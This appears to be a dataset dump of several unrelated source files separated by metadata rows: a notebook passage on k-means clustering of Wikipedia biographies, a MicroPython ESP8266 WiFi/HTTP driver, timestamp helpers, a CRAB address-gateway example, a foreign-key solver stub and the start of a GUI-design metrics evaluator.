# * Fetch nearest neighbors of each centroid from the set of documents assigned to that cluster. We will consider these documents as being representative of the cluster.
# * Print titles and first sentences of those nearest neighbors.
# * Print top 5 words that have highest tf-idf weights in each centroid.
# In[46]:
def visualize_document_clusters(wiki, tf_idf, centroids, cluster_assignment, k, map_index_to_word, display_content=True):
    '''Print a human-readable summary of each of the k clusters.

    For every cluster this prints the top-5 words by centroid TF-IDF weight
    and, optionally, the 8 documents nearest (Euclidean) to the centroid.

    wiki: original dataframe
    tf_idf: data matrix, sparse matrix format
    centroids: dense array of cluster centroids (one row per cluster)
    cluster_assignment: array mapping each document to its cluster index
    k: number of clusters
    map_index_to_word: SFrame specifying the mapping between words and column indices
    display_content: if True, display 8 nearest neighbors of each centroid

    NOTE: Python 2 code -- uses xrange and the print statement; the trailing
    comma after print(...) suppresses the newline (Python 2 semantics).'''
    print('==========================================================')
    # Visualize each cluster c
    for c in xrange(k):
        # Cluster heading (trailing comma: stay on the same line)
        print('Cluster {0:d} '.format(c)),
        # Print top 5 words with largest TF-IDF weights in the cluster
        # (argsort ascending, reversed to get descending weights)
        idx = centroids[c].argsort()[::-1]
        for i in xrange(5): # Print each word along with the TF-IDF weight
            print('{0:s}:{1:.3f}'.format(map_index_to_word['category'][idx[i]], centroids[c,idx[i]])),
        print('')
        if display_content:
            # Compute distances from the centroid to all data points in the cluster,
            # and compute nearest neighbors of the centroids within the cluster.
            distances = pairwise_distances(tf_idf, centroids[c].reshape(1, -1), metric='euclidean').flatten()
            distances[cluster_assignment!=c] = float('inf') # remove non-members from consideration
            nearest_neighbors = distances.argsort()
            # For 8 nearest neighbors, print the title as well as first 180 characters of text.
            # Wrap the text at 80-character mark.
            for i in xrange(8):
                # Take at most the first 25 whitespace-separated tokens of the text
                text = ' '.join(wiki[nearest_neighbors[i]]['text'].split(None, 25)[0:25])
                print('\n* {0:50s} {1:.5f}\n {2:s}\n {3:s}'.format(wiki[nearest_neighbors[i]]['name'],
                    distances[nearest_neighbors[i]], text[:90], text[90:180] if len(text) > 90 else ''))
    print('==========================================================')
# Let us first look at the 2 cluster case (K=2).
# In[48]:
# NOTE: centroids[2] and cluster_assignment[2] are zero-argument lambdas that
# lazily load the arrays from the npz archive; the trailing () triggers the load.
'''Notice the extra pairs of parentheses for centroids and cluster_assignment.
The centroid and cluster_assignment are still inside the npz file,
and we need to explicitly indicate when to load them into memory.'''
visualize_document_clusters(wiki, tf_idf, centroids[2](), cluster_assignment[2](), 2, map_index_to_word)
# Both clusters have mixed content, although cluster 1 is much purer than cluster 0:
# * Cluster 0: artists, songwriters, professors, politicians, writers, etc.
# * Cluster 1: baseball players, hockey players, soccer (association football) players, etc.
#
# Top words of cluster 1 are all related to sports, whereas top words of cluster 0 show no clear pattern.
#
# Roughly speaking, the entire dataset was divided into athletes and non-athletes. It would be better if we sub-divided non-athletes into more categories. So let us use more clusters. How about `K=10`?
# In[49]:
# Repeat the visualization with K=10 clusters (delayed npz load via the trailing ()).
k = 10
visualize_document_clusters(wiki, tf_idf, centroids[k](), cluster_assignment[k](), k, map_index_to_word)
# Clusters 0, 1, and 5 appear to be still mixed, but others are quite consistent in content.
# * Cluster 0: artists, actors, film directors, playwrights
# * Cluster 1: soccer (association football) players, rugby players
# * Cluster 2: track and field athletes
# * Cluster 3: baseball players
# * Cluster 4: professors, researchers, scholars
# * Cluster 5: Australian rules football players, American football players
# * Cluster 6: female figures from various fields
# * Cluster 7: composers, songwriters, singers, music producers
# * Cluster 8: ice hockey players
# * Cluster 9: politicians
#
# Clusters are now more pure, but some are qualitatively "bigger" than others. For instance, the category of scholars is more general than the category of baseball players. Increasing the number of clusters may split larger clusters. Another way to look at the size of the clusters is to count the number of articles in each cluster.
# In[50]:
np.bincount(cluster_assignment[10]())
# **Quiz Question**. Which of the 10 clusters above contains the greatest number of articles?
#
# 1. Cluster 0: artists, actors, film directors, playwrights
# 2. Cluster 4: professors, researchers, scholars
# 3. Cluster 5: Australian rules football players, American football players
# 4. Cluster 7: composers, songwriters, singers, music producers
# 5. Cluster 9: politicians
# **Quiz Question**. Which of the 10 clusters contains the least number of articles?
#
# 1. Cluster 1: soccer (association football) players, rugby players
# 2. Cluster 3: baseball players
# 3. Cluster 6: female figures from various fields
# 4. Cluster 7: composers, songwriters, singers, music producers
# 5. Cluster 8: ice hockey players
# There appears to be at least some connection between the topical consistency of a cluster and the number of its member data points.
# Let us visualize the case for K=25. For the sake of brevity, we do not print the content of documents. It turns out that the top words with highest TF-IDF weights in each cluster are representative of the cluster.
# In[51]:
# K=25: show only the top words per cluster (no document excerpts).
visualize_document_clusters(wiki, tf_idf, centroids[25](), cluster_assignment[25](), 25,
                            map_index_to_word, display_content=False) # turn off text for brevity
# Looking at the representative examples and top words, we classify each cluster as follows. Notice the bolded items, which indicate the appearance of a new theme.
# * Cluster 0: **lawyers, judges, legal scholars**
# * Cluster 1: **professors, researchers, scholars (natural and health sciences)**
# * Cluster 2: ice hockey players
# * Cluster 3: politicians
# * Cluster 4: **government officials**
# * Cluster 5: politicians
# * Cluster 6: **professors, researchers, scholars (social sciences and humanities)**
# * Cluster 7: Canadian politicians
# * Cluster 8: **car racers**
# * Cluster 9: **economists**
# * Cluster 10: track and field athletes
# * Cluster 11: females from various fields
# * Cluster 12: (mixed; no clear theme)
# * Cluster 13: baseball players
# * Cluster 14: **painters, sculptors, artists**
# * Cluster 15: Australian rules football players, American football players
# * Cluster 16: **musicians, composers**
# * Cluster 17: soccer (association football) players, rugby players
# * Cluster 18: **poets**
# * Cluster 19: **film directors, playwrights**
# * Cluster 20: **songwriters, singers, music producers**
# * Cluster 21: **generals of U.S. Air Force**
# * Cluster 22: **music directors, conductors**
# * Cluster 23: **basketball players**
# * Cluster 24: **golf players**
#
# Indeed, increasing K achieved the desired effect of breaking up large clusters. Depending on the application, this may or may not be preferable to the K=10 analysis.
#
# Let's take it to the extreme and set K=100. We have a suspicion that this value is too large. Let us look at the top words from each cluster:
# In[53]:
# K=100: visualize top words only; excerpts would be overwhelming at this K.
k=100
visualize_document_clusters(wiki, tf_idf, centroids[k](), cluster_assignment[k](), k,
                            map_index_to_word, display_content=False)
# turn off text for brevity -- turn it on if you are curious ;)
# The class of soccer (association football) players has been broken into two clusters (44 and 45). Same goes for Austrialian rules football players (clusters 26 and 48). The class of baseball players have been also broken into two clusters (16 and 91).
#
# **A high value of K encourages pure clusters, but we cannot keep increasing K. For large enough K, related documents end up going to different clusters.**
#
# That said, the result for K=100 is not entirely bad. After all, it gives us separate clusters for such categories as Brazil, wrestling, computer science and the Mormon Church. If we set K somewhere between 25 and 100, we should be able to avoid breaking up clusters while discovering new ones.
#
# Also, we should ask ourselves how much **granularity** we want in our clustering. If we wanted a rough sketch of Wikipedia, we don't want too detailed clusters. On the other hand, having many clusters can be valuable when we are zooming into a certain part of Wikipedia.
#
# **There is no golden rule for choosing K. It all depends on the particular application and domain we are in.**
#
# Another heuristic people use that does not rely on so much visualization, which can be hard in many applications (including here!) is as follows. Track heterogeneity versus K and look for the "elbow" of the curve where the heterogeneity decrease rapidly before this value of K, but then only gradually for larger values of K. This naturally trades off between trying to minimize heterogeneity, but reduce model complexity. In the heterogeneity versus K plot made above, we did not yet really see a flattening out of the heterogeneity, which might indicate that indeed K=100 is "reasonable" and we only see real overfitting for larger values of K (which are even harder to visualize using the methods we attempted above.)
# **Quiz Question**. Another sign of too large K is having lots of small clusters. Look at the distribution of cluster sizes (by number of member data points). How many of the 100 clusters have fewer than 236 articles, i.e. 0.4% of the dataset?
#
# Hint: Use `cluster_assignment[100]()`, with the extra pair of parentheses for delayed loading.
# In[55]:
# Count how many of the 100 clusters contain fewer than 236 articles
# (0.4% of the dataset) -- many tiny clusters suggest K is set too large.
temp = cluster_assignment[100]()  # the trailing () triggers the delayed npz load
count = 0
for i in range(100):
    total = (temp == i).sum()
    if total < 236:
        count += 1
# Bug fix: use the function-call form of print, which is valid in both
# Python 2 and Python 3 and consistent with the rest of this notebook.
print(count)
# ### Takeaway
#
# Keep in mind though that tiny clusters aren't necessarily bad. A tiny cluster of documents that really look like each others is definitely preferable to a medium-sized cluster of documents with mixed content. However, having too few articles in a cluster may cause overfitting by reading too much into a limited pool of training data.
| 46.01873 | 725 | 0.707195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 31,869 | 0.720627 |
d316a1c92ea2eacd99036644096b71daf8954435 | 18,504 | py | Python | esp8266.py | mertaksoy/rpi-pico-micropython-esp8266-lib | b6500493294fc37719f6c5494b2ddd0882ac260c | [
"MIT"
] | 8 | 2021-12-30T18:31:26.000Z | 2022-03-22T01:11:29.000Z | esp8266.py | mertaksoy/rpi-pico-micropython-esp8266-lib | b6500493294fc37719f6c5494b2ddd0882ac260c | [
"MIT"
] | 1 | 2021-11-06T22:54:47.000Z | 2021-12-29T03:28:18.000Z | esp8266.py | mertaksoy/rpi-pico-micropython-esp8266-lib | b6500493294fc37719f6c5494b2ddd0882ac260c | [
"MIT"
] | 6 | 2021-09-28T06:35:59.000Z | 2022-01-10T10:36:41.000Z | from machine import UART, Pin
import time
from httpParser import HttpParser
# Response terminator strings emitted by the ESP8266 AT firmware; a reply is
# considered complete when it contains one of these markers.
ESP8266_OK_STATUS = "OK\r\n"
ESP8266_ERROR_STATUS = "ERROR\r\n"
ESP8266_FAIL_STATUS = "FAIL\r\n"
# Asynchronous WiFi status lines reported while joining / leaving an AP.
ESP8266_WIFI_CONNECTED="WIFI CONNECTED\r\n"
ESP8266_WIFI_GOT_IP_CONNECTED="WIFI GOT IP\r\n"
ESP8266_WIFI_DISCONNECTED="WIFI DISCONNECT\r\n"
ESP8266_WIFI_AP_NOT_PRESENT="WIFI AP NOT FOUND\r\n"
ESP8266_WIFI_AP_WRONG_PWD="WIFI AP WRONG PASSWORD\r\n"
# Reported while a previous command is still being processed.
ESP8266_BUSY_STATUS="busy p...\r\n"
# UART driver buffer sizes (bytes) used when opening the bus.
UART_Tx_BUFFER_LENGTH = 1024
UART_Rx_BUFFER_LENGTH = 1024*2
class ESP8266:
    """
    Driver for an ESP8266 WiFi module controlled over UART with AT commands.

    Using this class you can join a WiFi access point and perform simple
    HTTP GET/POST operations from a Raspberry Pi Pico running MicroPython.

    Attributes:
        uartPort (int): UART bus number of the RPi Pico [Default UART0]
        baudRate (int): UART baud rate for communicating between the
            RPi Pico & the ESP8266 [Default 115200]
        txPin (int): RPi Pico's Tx pin [Default Pin 0]
        rxPin (int): RPi Pico's Rx pin [Default Pin 1]
    """
    __rxData = None
    __txData = None
    __httpResponse = None

    def __init__(self, uartPort=0, baudRate=115200, txPin=(0), rxPin=(1)):
        """
        Constructor for the ESP8266 class.

        Parameters:
            uartPort (int): UART bus number of the RPi Pico [Default UART0]
            baudRate (int): UART baud rate [Default 115200]
            txPin (int): RPi Pico's Tx pin [Default Pin 0]
            rxPin (int): RPi Pico's Rx pin [Default Pin 1]
        """
        self.__uartPort = uartPort
        self.__baudRate = baudRate
        self.__txPin = txPin
        self.__rxPin = rxPin
        self.__uartObj = UART(
            self.__uartPort,
            baudrate=self.__baudRate,
            tx=Pin(self.__txPin),
            rx=Pin(self.__rxPin),
            txbuf=UART_Tx_BUFFER_LENGTH,
            rxbuf=UART_Rx_BUFFER_LENGTH,
        )

    def _createHTTPParseObj(self):
        """
        Create a fresh HttpParser before every HTTP GET/POST operation,
        discarding the parser from any previous request.
        """
        if self.__httpResponse is not None:
            del self.__httpResponse
        self.__httpResponse = HttpParser()

    def _sendToESP8266(self, atCMD, delay=1):
        """
        Send one AT command to the ESP8266 and collect its response.

        Parameters:
            atCMD (str): complete AT command, including the trailing "\\r\\n"
            delay (int): seconds to wait before polling for a response

        Returns:
            The raw response when it contains an OK/ERROR/FAIL terminator,
            the string "ESP BUSY\\r\\n" when the module reports busy,
            otherwise None.
        """
        self.__txData = atCMD
        self.__uartObj.write(self.__txData)
        self.__rxData = bytes()
        time.sleep(delay)
        # Busy-wait until at least one byte of the reply has arrived.
        while True:
            if self.__uartObj.any() > 0:
                break
        while self.__uartObj.any() > 0:
            self.__rxData += self.__uartObj.read(UART_Rx_BUFFER_LENGTH)
        # NOTE(review): the status constants are str while __rxData is bytes;
        # this mixed membership test relies on MicroPython's lenient str/bytes
        # handling -- do not port as-is to CPython. TODO confirm on target.
        if ESP8266_OK_STATUS in self.__rxData:
            return self.__rxData
        elif ESP8266_ERROR_STATUS in self.__rxData:
            return self.__rxData
        elif ESP8266_FAIL_STATUS in self.__rxData:
            return self.__rxData
        elif ESP8266_BUSY_STATUS in self.__rxData:
            return "ESP BUSY\r\n"
        else:
            return None

    def startUP(self):
        """
        Check the communication between the ESP8266 & RPi Pico ("AT").

        Returns:
            True if communication succeeds, False otherwise.
        """
        retData = self._sendToESP8266("AT\r\n")
        if retData is not None:
            return ESP8266_OK_STATUS in retData
        # Bug fix: the original had a bare `False` expression here and fell
        # through returning None; now it returns False as documented.
        return False

    def reStart(self):
        """
        Reset the ESP8266 ("AT+RST") and re-check communication.

        Returns:
            True if the reset succeeded and the module responds again,
            False otherwise.
        """
        retData = self._sendToESP8266("AT+RST\r\n")
        if retData is not None:
            if ESP8266_OK_STATUS in retData:
                time.sleep(5)  # give the module time to reboot
                return self.startUP()
            return False
        # Bug fix: the original had a bare `False` expression here (no return).
        return False

    def echoING(self, enable=False):
        """
        Enable/disable AT command echo [default False, i.e. echo off].

        Parameters:
            enable (bool): True sends "ATE1" (echo on), False sends "ATE0".

        Returns:
            True if the ATE command was acknowledged, False otherwise.
        """
        cmd = "ATE1\r\n" if enable else "ATE0\r\n"
        retData = self._sendToESP8266(cmd)
        if retData is not None:
            return ESP8266_OK_STATUS in retData
        return False

    def getVersion(self):
        """
        Get the AT command firmware version details ("AT+GMR").

        Returns:
            Version details string on success, else None.
        """
        retData = self._sendToESP8266("AT+GMR\r\n")
        if retData is not None and ESP8266_OK_STATUS in retData:
            # Keep only the three version lines that precede the "OK" marker.
            retData = str(retData).partition(r"OK")[0]
            retData = retData.split(r"\r\n")
            retData[0] = retData[0].replace("b'", "")
            retData = str(retData[0] + "\r\n" + retData[1] + "\r\n" + retData[2])
            return retData
        return None

    def reStore(self):
        """
        Factory-reset the ESP8266 ("AT+RESTORE"), deleting saved configuration.

        Returns:
            True on success, False on an error reply, None when no reply
            was received (matching the original behavior).
        """
        retData = self._sendToESP8266("AT+RESTORE\r\n")
        if retData is not None:
            return ESP8266_OK_STATUS in retData
        return None

    def getCurrentWiFiMode(self):
        """
        Query the ESP8266 WiFi's current mode ("AT+CWMODE_CUR?").

        Returns:
            "STA", "SoftAP", "SoftAP+STA", or None on failure.
        """
        retData = self._sendToESP8266("AT+CWMODE_CUR?\r\n")
        if retData is not None:
            if "1" in retData:
                return "STA"
            elif "2" in retData:
                return "SoftAP"
            elif "3" in retData:
                return "SoftAP+STA"
            else:
                return None
        return None

    def setCurrentWiFiMode(self, mode=3):
        """
        Set the ESP8266 WiFi's current mode ("AT+CWMODE_CUR=").

        Parameters:
            mode (int): 1: STA, 2: SoftAP, 3: SoftAP+STA (default)

        Returns:
            True on success, False on failure.
        """
        txData = "AT+CWMODE_CUR=" + str(mode) + "\r\n"
        retData = self._sendToESP8266(txData)
        if retData is not None:
            return ESP8266_OK_STATUS in retData
        return False

    def getDefaultWiFiMode(self):
        """
        Query the ESP8266 WiFi's default (persisted) mode ("AT+CWMODE_DEF?").

        Returns:
            "STA", "SoftAP", "SoftAP+STA", or None on failure.
        """
        retData = self._sendToESP8266("AT+CWMODE_DEF?\r\n")
        if retData is not None:
            if "1" in retData:
                return "STA"
            elif "2" in retData:
                return "SoftAP"
            elif "3" in retData:
                return "SoftAP+STA"
            else:
                return None
        return None

    def setDefaultWiFiMode(self, mode=3):
        """
        Set the ESP8266 WiFi's default (persisted) mode ("AT+CWMODE_DEF=").

        Parameters:
            mode (int): 1: STA, 2: SoftAP, 3: SoftAP+STA (default)

        Returns:
            True on success, False on failure.
        """
        txData = "AT+CWMODE_DEF=" + str(mode) + "\r\n"
        retData = self._sendToESP8266(txData)
        if retData is not None:
            return ESP8266_OK_STATUS in retData
        return False

    def getAvailableAPs(self):
        """
        Query the ESP8266 for available WiFi access points ("AT+CWLAP").

        Returns:
            List of tuples describing the visible APs, or None on failure.
        """
        raw = self._sendToESP8266("AT+CWLAP\r\n", delay=10)
        # Bug fix: check for a missing reply *before* stringifying -- the
        # original applied str() first, so its None-check could never trigger.
        if raw is None:
            return None
        retData = str(raw)
        retData = retData.replace("+CWLAP:", "")
        retData = retData.replace(r"\r\n\r\nOK\r\n", "")
        retData = retData.replace(r"\r\n", "@")
        retData = retData.replace("b'(", "(").replace("'", "")
        retData = retData.split("@")
        apLists = list()
        for items in retData:
            data = str(items).replace("(", "").replace(")", "").split(",")
            apLists.append(tuple(data))
        return apLists

    def connectWiFi(self, ssid, pwd):
        """
        Connect the ESP8266 to a WiFi access point ("AT+CWJAP_CUR=").

        Parameters:
            ssid (str): WiFi AP's SSID
            pwd (str): WiFi AP's password

        Returns:
            ESP8266_WIFI_CONNECTED on success, otherwise one of the
            ESP8266_WIFI_* status strings describing the failure.
        """
        txData = "AT+CWJAP_CUR=" + '"' + ssid + '"' + ',' + '"' + pwd + '"' + "\r\n"
        retData = self._sendToESP8266(txData, delay=15)
        if retData is not None:
            if "+CWJAP" in retData:
                # +CWJAP:<code> -- error code reported by the firmware
                if "1" in retData:
                    return ESP8266_WIFI_DISCONNECTED
                elif "2" in retData:
                    return ESP8266_WIFI_AP_WRONG_PWD
                elif "3" in retData:
                    return ESP8266_WIFI_AP_NOT_PRESENT
                elif "4" in retData:
                    return ESP8266_WIFI_DISCONNECTED
                else:
                    return None
            elif ESP8266_WIFI_CONNECTED in retData:
                if ESP8266_WIFI_GOT_IP_CONNECTED in retData:
                    return ESP8266_WIFI_CONNECTED
                else:
                    return ESP8266_WIFI_DISCONNECTED
            else:
                return ESP8266_WIFI_DISCONNECTED
        return ESP8266_WIFI_DISCONNECTED

    def disconnectWiFi(self):
        """
        Disconnect the ESP8266 from the connected WiFi AP ("AT+CWQAP").

        Returns:
            True on success, False on failure.
        """
        retData = self._sendToESP8266("AT+CWQAP\r\n")
        if retData is not None:
            return ESP8266_OK_STATUS in retData
        return False

    def _createTCPConnection(self, link, port=80):
        """
        Open a TCP connection to the host ("AT+CIPSTART"), like creating a
        socket before completing an HTTP GET/POST operation.

        Parameters:
            link (str): host name or IP to connect to
            port (int): TCP port [Default 80]

        Returns:
            True when the connection was established, False otherwise.
        """
        txData = "AT+CIPSTART=" + '"' + "TCP" + '"' + ',' + '"' + link + '"' + ',' + str(port) + "\r\n"
        retData = self._sendToESP8266(txData)
        if retData is not None:
            return ESP8266_OK_STATUS in retData
        # Bug fix: the original had a bare `False` expression here (no return).
        return False

    def doHttpGet(self, host, path, user_agent="RPi-Pico", port=80):
        """
        Perform an HTTP GET operation.

        Parameters:
            host (str): host name only [ex: URL www.httpbin.org/ip -> host "www.httpbin.org"]
            path (str): URL path [ex: URL www.httpbin.org/ip -> path "/ip"]
            user_agent (str): User-Agent header value [Default "RPi-Pico"]
            port (int): HTTP port number [Default 80]

        Returns:
            (HTTP status code, response body); the body is None unless the
            status is 200. On failure returns (0, None).
        """
        if self._createTCPConnection(host, port) == True:
            self._createHTTPParseObj()
            getHeader = (
                "GET " + path + " HTTP/1.1\r\n"
                + "Host: " + host + "\r\n"
                + "User-Agent: " + user_agent + "\r\n"
                + "\r\n"
            )
            # Announce the payload length, wait for the ">" prompt, then send.
            txData = "AT+CIPSEND=" + str(len(getHeader)) + "\r\n"
            retData = self._sendToESP8266(txData)
            if retData is not None:
                if ">" in retData:
                    retData = self._sendToESP8266(getHeader, delay=2)
                    self._sendToESP8266("AT+CIPCLOSE\r\n")
                    retData = self.__httpResponse.parseHTTP(retData)
                    return retData, self.__httpResponse.getHTTPResponse()
                else:
                    return 0, None
            else:
                return 0, None
        else:
            self._sendToESP8266("AT+CIPCLOSE\r\n")
            return 0, None

    def doHttpPost(self, host, path, content_type, content, user_agent="RPi-Pico", port=80):
        """
        Perform an HTTP POST operation.

        Bug fix: the original signature placed the defaulted user_agent
        parameter before the required content_type/content parameters, which
        is a SyntaxError in Python; required parameters now come first.

        Parameters:
            host (str): host name only [ex: URL www.httpbin.org/ip -> host "www.httpbin.org"]
            path (str): URL path [ex: URL www.httpbin.org/ip -> path "/ip"]
            content_type (str): upload content type [ex. "application/json",
                "application/x-www-form-urlencoded", "text/plain"]
            content (str): upload content
            user_agent (str): User-Agent header value [Default "RPi-Pico"]
            port (int): HTTP port number [Default 80]

        Returns:
            (HTTP status code, response body); the body is None unless the
            status is 200. On failure returns (0, None).
        """
        if self._createTCPConnection(host, port) == True:
            self._createHTTPParseObj()
            postHeader = (
                "POST " + path + " HTTP/1.1\r\n"
                + "Host: " + host + "\r\n"
                + "User-Agent: " + user_agent + "\r\n"
                + "Content-Type: " + content_type + "\r\n"
                + "Content-Length: " + str(len(content)) + "\r\n"
                + "\r\n"
                + content + "\r\n"
            )
            # Announce the payload length, wait for the ">" prompt, then send.
            txData = "AT+CIPSEND=" + str(len(postHeader)) + "\r\n"
            retData = self._sendToESP8266(txData)
            if retData is not None:
                if ">" in retData:
                    retData = self._sendToESP8266(postHeader, delay=2)
                    self._sendToESP8266("AT+CIPCLOSE\r\n")
                    retData = self.__httpResponse.parseHTTP(retData)
                    return retData, self.__httpResponse.getHTTPResponse()
                else:
                    return 0, None
            else:
                return 0, None
        else:
            self._sendToESP8266("AT+CIPCLOSE\r\n")
            return 0, None

    def __del__(self):
        """
        Destructor for the ESP8266 class.
        """
        print('Destructor called, ESP8266 deleted.')
| 36.497041 | 209 | 0.541829 | 17,976 | 0.971466 | 0 | 0 | 0 | 0 | 0 | 0 | 8,962 | 0.484328 |
d318c848b55117fd7c66c4af724183f8868ea105 | 436 | py | Python | src/data_science/data_science/tools/time.py | viclule/api_models_deployment_framework | 7595cf0b4f3e277925b968014102d7561547bcd4 | [
"MIT"
] | null | null | null | src/data_science/data_science/tools/time.py | viclule/api_models_deployment_framework | 7595cf0b4f3e277925b968014102d7561547bcd4 | [
"MIT"
] | null | null | null | src/data_science/data_science/tools/time.py | viclule/api_models_deployment_framework | 7595cf0b4f3e277925b968014102d7561547bcd4 | [
"MIT"
] | null | null | null | from datetime import datetime, timezone
def get_timestamp_isoformat():
    """
    Return the current UTC time as an ISO 8601 string,
    e.g. "2021-01-01T12:00:00Z" (seconds precision).
    """
    now = datetime.utcnow().replace(microsecond=0)
    return now.isoformat("T") + "Z"
def get_timestamp_unix():
    """
    Return the current time as a Unix timestamp: a float of seconds
    (with fractional part) since the epoch, in UTC.
    ########.###
    """
    # Simplified: the original called a no-op .replace() on a naive utcnow()
    # and then re-attached the UTC timezone; an aware "now" yields the same
    # timestamp directly.
    return datetime.now(timezone.utc).timestamp()
| 21.8 | 70 | 0.637615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 128 | 0.293578 |
d318e2e1e00efb11661eb79da804990357c744f8 | 511 | py | Python | examples/crab_gateway.py | OnroerendErfgoed/crabpy | 218607957fbb9293a3054ae0613f7c2e3e44f697 | [
"MIT"
] | 4 | 2015-01-04T19:22:47.000Z | 2018-10-17T20:09:01.000Z | examples/crab_gateway.py | OnroerendErfgoed/crabpy | 218607957fbb9293a3054ae0613f7c2e3e44f697 | [
"MIT"
] | 123 | 2015-02-22T22:25:45.000Z | 2022-03-01T17:58:06.000Z | examples/crab_gateway.py | OnroerendErfgoed/crabpy | 218607957fbb9293a3054ae0613f7c2e3e44f697 | [
"MIT"
] | 2 | 2017-06-06T09:29:29.000Z | 2017-09-15T11:44:23.000Z | # -*- coding: utf-8 -*-
'''
This script demonstrates using the crab gateway to walk the entire
address tree (street and number) of a `gemeente`.
'''
from crabpy.client import crab_request, crab_factory
from crabpy.gateway.crab import CrabGateway
# Create a CRAB gateway on top of a default CRAB service client.
gateway = CrabGateway(crab_factory())

# Fetch one municipality ("gemeente") and walk its full address tree:
# streets -> house numbers -> sub-addresses.
municipality = gateway.get_gemeente_by_id(1)
print(str(municipality))
for street in municipality.straten:
    print("* %s" % street)
    for house_number in street.huisnummers:
        print("\t* %s" % house_number)
        for sub_address in house_number.subadressen:
            print("\t\t* %s" % sub_address)
| 24.333333 | 66 | 0.661448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 171 | 0.334638 |
d31a96e194e159ff9f667fe1d5373f70080f5da4 | 1,127 | py | Python | datatracer/foreign_key/base.py | HDI-Project/DataTracer | 4bb0906f1716bbcfeb0881cade5d6d47bca90764 | [
"MIT"
] | 15 | 2020-05-27T11:55:05.000Z | 2022-02-08T11:07:54.000Z | datatracer/foreign_key/base.py | HDI-Project/DataTracer | 4bb0906f1716bbcfeb0881cade5d6d47bca90764 | [
"MIT"
] | 21 | 2020-06-02T11:56:13.000Z | 2021-07-29T21:50:27.000Z | datatracer/foreign_key/base.py | HDI-Project/DataTracer | 4bb0906f1716bbcfeb0881cade5d6d47bca90764 | [
"MIT"
] | 3 | 2021-01-19T17:10:58.000Z | 2021-08-13T20:47:33.000Z | """Foreign Key Solving base class."""
class ForeignKeySolver():

    def fit(self, list_of_databases):
        """Fit this solver.

        Args:
            list_of_databases (list):
                List of tuples containing ``MetaData`` instances and table
                dictionaries, which map table names to ``pandas.DataFrame``
                values.
        """
        pass

    def solve(self, tables, primary_keys=None):
        """Solve the foreign key detection problem.

        The output is a list of foreign key specifications, in order from the
        most likely to the least likely.

        Args:
            tables (dict):
                Dict mapping table names to ``pandas.DataFrame`` values.
            primary_keys (dict):
                (Optional). Dictionary of table primary keys, as returned by
                the Primary Key Solvers. This parameter is optional and not
                all the subclasses need it.

        Returns:
            list:
                List of foreign key specifications, sorted by likelihood.
        """
        raise NotImplementedError()
d31b0e2a66034752b1a8448b8586de5dae1ee9d7 | 10,963 | py | Python | aim2_metrics/aim/evaluators/evaluators.py | heseba/aim | 938336a17c503390ec98a730a828e4b26e5900d7 | [
"MIT"
] | null | null | null | aim2_metrics/aim/evaluators/evaluators.py | heseba/aim | 938336a17c503390ec98a730a828e4b26e5900d7 | [
"MIT"
] | null | null | null | aim2_metrics/aim/evaluators/evaluators.py | heseba/aim | 938336a17c503390ec98a730a828e4b26e5900d7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Evaluators.
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
# Standard library modules
import importlib
import time
from datetime import date
from pathlib import Path
from typing import Any, Dict, List, Optional
# Third-party modules
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import pandas as pd
import seaborn as sns
from loguru import logger
# First-party modules
from aim.core import image_utils
# ----------------------------------------------------------------------------
# Metadata
# ----------------------------------------------------------------------------
__author__ = "Markku Laine"
__date__ = "2021-02-09"
__email__ = "markku.laine@aalto.fi"
__version__ = "1.0"
# ----------------------------------------------------------------------------
# Evaluators
# ----------------------------------------------------------------------------
class GUIDesignsEvaluator:
    """Batch-evaluate GUI design screenshots with a fixed set of AIM metrics.

    Runs metrics m1-m6 over every input PNG and persists the results (with
    per-step timings) to a CSV file under the output directory.
    """

    # Private constants
    # Module names (under aim.metrics) of the metrics executed per GUI design.
    _METRICS: List[str] = [
        "m1_png_file_size", # PNG file size
        "m2_jpeg_file_size", # JPEG file size
        "m3_distinct_rgb_values", # Distinct RGB values
        "m4_contour_density", # Contour density
        "m5_figure_ground_contrast", # Figure-ground contrast
        "m6_contour_congestion", # Contour congestion
    ]
    # Human-readable names for the first result column of each metric.
    _METRIC_RESULTS = {
        "m1_result_1": {"name": "PNG file size in bytes"},
        "m2_result_1": {"name": "JPEG file size in bytes"},
        "m3_result_1": {"name": "Number of distinct RGB values"},
        "m4_result_1": {"name": "Contour density"},
        "m5_result_1": {"name": "Figure-ground contrast"},
        "m6_result_1": {"name": "Contour congestion"},
    }

    # Public constants
    NAME: str = "GUI Designs Evaluator"
    VERSION: str = "1.0"
# Initializer
    def __init__(self, input_dir: str, output_dir: str, plot_results: bool):
        """Initialize the evaluator.

        Args:
            input_dir: Directory holding the GUI design PNG files (and an
                optional CSV file selecting which files to include).
            output_dir: Base output directory; a subdirectory named after
                the input directory is used for the results.
            plot_results: Whether result plots should be generated.
        """
        self.input_dir: Path = Path(input_dir)
        # Optional CSV listing the input files; located later by _set_input_csv_file()
        self.input_csv_file: Optional[Path] = None
        self.input_gui_design_files: List[Path] = []
        # One dict per evaluated GUI design; loaded/initialized by _set_results()
        self.results: Optional[List[Dict[str, Any]]] = None
        # Results land in <output_dir>/<input_dir name>/<input_dir name>.csv
        self.output_dir: Path = Path(output_dir) / self.input_dir.name
        self.output_csv_file: Path = self.output_dir / "{}.csv".format(
            self.output_dir.name
        )
        self.plot_results: bool = plot_results
# Private methods
def _set_input_csv_file(self):
for csv_file_path in list(self.input_dir.glob("*.csv"))[:1]:
self.input_csv_file = csv_file_path
    def _set_input_gui_design_files(self):
        """Collect the input GUI design (PNG) files to evaluate.

        When a CSV file is present, only rows whose ``include`` column equals
        "yes" are used; otherwise every ``*.png`` file in the input directory
        is evaluated.
        """
        # Get input CSV file
        if self.input_csv_file:
            # Read input data
            input_df = pd.read_csv(self.input_csv_file)
            # Exclude some rows (keep only those explicitly marked "yes")
            input_df = input_df.loc[input_df["include"] == "yes"]
            # Get input GUI design files
            self.input_gui_design_files = [
                self.input_dir / file for file in input_df["filename"].tolist()
            ]
        # No input CSV file available
        else:
            # Get input GUI design files
            self.input_gui_design_files = list(self.input_dir.glob("*.png"))
    def _set_results(self):
        """Load previous evaluation results (if any) so evaluation can resume.

        Rows with missing values are dropped because they represent
        unfinished evaluations.
        """
        # Get output CSV file (previous results)
